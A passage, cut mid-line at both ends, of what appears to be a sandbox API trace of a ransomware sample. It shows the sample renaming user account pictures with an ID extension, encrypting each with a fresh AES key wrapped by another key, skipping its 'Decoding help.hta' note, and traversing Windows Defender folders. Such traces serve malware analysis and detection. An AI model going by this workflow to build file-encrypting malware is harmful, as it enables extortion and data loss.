Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0043.249] GlobalMemoryStatus (in: lpBuffer=0xf74fd10 | out: lpBuffer=0xf74fd10) [0043.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98e2980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a0 [0043.250] CloseHandle (hObject=0x6a0) returned 1 [0043.250] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0043.250] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.250] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.250] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" [0043.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0043.250] lstrcmpiW (lpString1="Decoding help.hta", lpString2="guest.bmp") returned -1 [0043.250] lstrlenW (lpString="guest.bmp") returned 9 [0043.250] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.250] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.250] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="guest.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" [0043.250] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" [0043.250] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0043.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.251] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0043.251] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x714 [0043.251] CryptAcquireContextA (in: phProv=0xf74fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf74fcec*=0x3448c70) returned 1 [0043.252] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0xf74fce8 | out: phKey=0xf74fce8*=0x671ab0) returned 1 [0043.252] CryptExportKey (in: hKey=0x671ab0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf74fbe4, pdwDataLen=0xf74fce4 | out: pbData=0xf74fbe4*, pdwDataLen=0xf74fce4*=0x2c) returned 1 [0043.252] MapViewOfFile (hFileMappingObject=0x714, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc020) returned 0xde30000 [0043.255] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf74fbe4*, pdwDataLen=0xf74fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xf74fbe4*, pdwDataLen=0xf74fcf8*=0x100) returned 1 [0043.255] CryptEncrypt (in: hKey=0x671ab0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde30000, pdwDataLen=0xf74fce4*=0xc020, dwBufLen=0xc020 | out: pbData=0xde30000*, pdwDataLen=0xf74fce4*=0xc020) returned 1 [0043.257] UnmapViewOfFile (lpBaseAddress=0xde30000) returned 1 [0043.258] CloseHandle (hObject=0x714) returned 1 [0043.258] CryptDestroyKey (hKey=0x671ab0) returned 1 [0043.258] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.259] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.259] WriteFile (in: hFile=0x6a0, lpBuffer=0xf74fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xf74fcf8, lpOverlapped=0x0 | out: lpBuffer=0xf74fbe4*, lpNumberOfBytesWritten=0xf74fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.259] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xf74fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xf74fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.259] CloseHandle (hObject=0x6a0) returned 1 [0043.261] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.261] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0043.261] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.261] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.261] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" [0043.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\decoding help.hta")) returned 0x1 [0043.261] lstrcmpiW (lpString1="Decoding help.hta", lpString2="user.bmp") returned -1 [0043.261] lstrlenW (lpString="user.bmp") returned 8 [0043.261] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*" [0043.261] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*") returned 54 [0043.261] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\", lpString2="user.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" [0043.261] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" [0043.261] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0043.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0043.265] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x714 [0043.265] CryptAcquireContextA (in: phProv=0xf74fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf74fcec*=0x3448c70) returned 1 [0043.266] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0xf74fce8 | out: phKey=0xf74fce8*=0x671b70) returned 1 [0043.266] CryptExportKey (in: hKey=0x671b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf74fbe4, pdwDataLen=0xf74fce4 | out: pbData=0xf74fbe4*, pdwDataLen=0xf74fce4*=0x2c) returned 1 [0043.266] MapViewOfFile (hFileMappingObject=0x714, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc020) returned 0xde30000 [0043.269] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf74fbe4*, pdwDataLen=0xf74fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xf74fbe4*, pdwDataLen=0xf74fcf8*=0x100) returned 1 [0043.269] CryptEncrypt (in: hKey=0x671b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xde30000, pdwDataLen=0xf74fce4*=0xc020, dwBufLen=0xc020 | out: pbData=0xde30000*, pdwDataLen=0xf74fce4*=0xc020) returned 1 [0043.269] UnmapViewOfFile (lpBaseAddress=0xde30000) returned 1 [0043.271] CloseHandle (hObject=0x714) returned 1 [0043.271] CryptDestroyKey (hKey=0x671b70) returned 1 [0043.271] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.271] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.271] WriteFile (in: hFile=0x6a0, lpBuffer=0xf74fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xf74fcf8, lpOverlapped=0x0 | out: lpBuffer=0xf74fbe4*, lpNumberOfBytesWritten=0xf74fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.272] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xf74fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xf74fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.272] CloseHandle (hObject=0x6a0) returned 1 [0043.273] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.274] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0xf74fd30 | out: lpFindFileData=0xf74fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0043.274] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 366 os_tid = 0x990 [0043.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*.*", lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.278] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.278] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.278] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0043.278] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 367 os_tid = 0xa18 [0043.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*.*", lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0043.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.316] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.316] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.316] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.316] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x1028fd30 | out: lpFindFileData=0x1028fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0043.316] FindClose (in: hFindFile=0x671ab0 | out: hFindFile=0x671ab0) returned 1 Thread: id = 368 os_tid = 0x984 [0043.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*", lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a30 [0043.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.299] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.299] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.299] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.299] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0043.300] lstrcmpW (lpString1=".", lpString2="Definition Updates") returned -1 [0043.300] lstrcmpW (lpString1="..", lpString2="Definition Updates") returned -1 [0043.300] lstrcmpiW (lpString1="windows", lpString2="Definition Updates") returned 1 [0043.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0043.300] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned 49 [0043.300] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\", lpString2="Definition Updates" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates" [0043.300] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0043.300] GlobalMemoryStatus (in: lpBuffer=0x119dfd10 | out: lpBuffer=0x119dfd10) [0043.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d9ec88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.301] CloseHandle (hObject=0x708) returned 1 [0043.301] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0043.301] lstrcmpW (lpString1=".", lpString2="LocalCopy") returned -1 [0043.301] lstrcmpW (lpString1="..", lpString2="LocalCopy") returned -1 [0043.301] lstrcmpiW (lpString1="windows", lpString2="LocalCopy") returned 1 [0043.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0043.301] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned 49 [0043.301] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\", lpString2="LocalCopy" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy" [0043.301] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*.*" [0043.301] GlobalMemoryStatus (in: lpBuffer=0x119dfd10 | out: lpBuffer=0x119dfd10) [0043.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10db6cf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.302] CloseHandle (hObject=0x708) returned 1 [0043.302] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0043.302] lstrcmpW (lpString1=".", lpString2="Quarantine") returned -1 [0043.302] lstrcmpW (lpString1="..", lpString2="Quarantine") returned -1 [0043.302] lstrcmpiW (lpString1="windows", lpString2="Quarantine") returned 1 [0043.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0043.302] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned 49 [0043.302] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\", lpString2="Quarantine" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine" [0043.302] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*.*" [0043.302] GlobalMemoryStatus (in: lpBuffer=0x119dfd10 | out: lpBuffer=0x119dfd10) [0043.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10dced58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0043.303] CloseHandle (hObject=0x708) returned 1 [0043.303] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x119dfd30 | out: lpFindFileData=0x119dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scans", cAlternateFileName="")) returned 1 [0043.303] lstrcmpW (lpString1=".", lpString2="Scans") returned -1 [0043.303] lstrcmpW (lpString1="..", lpString2="Scans") returned -1 [0043.303] lstrcmpiW (lpString1="windows", lpString2="Scans") returned 1 [0043.303] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*" [0043.303] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*.*") returned 49 [0043.303] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\", lpString2="Scans" | out: 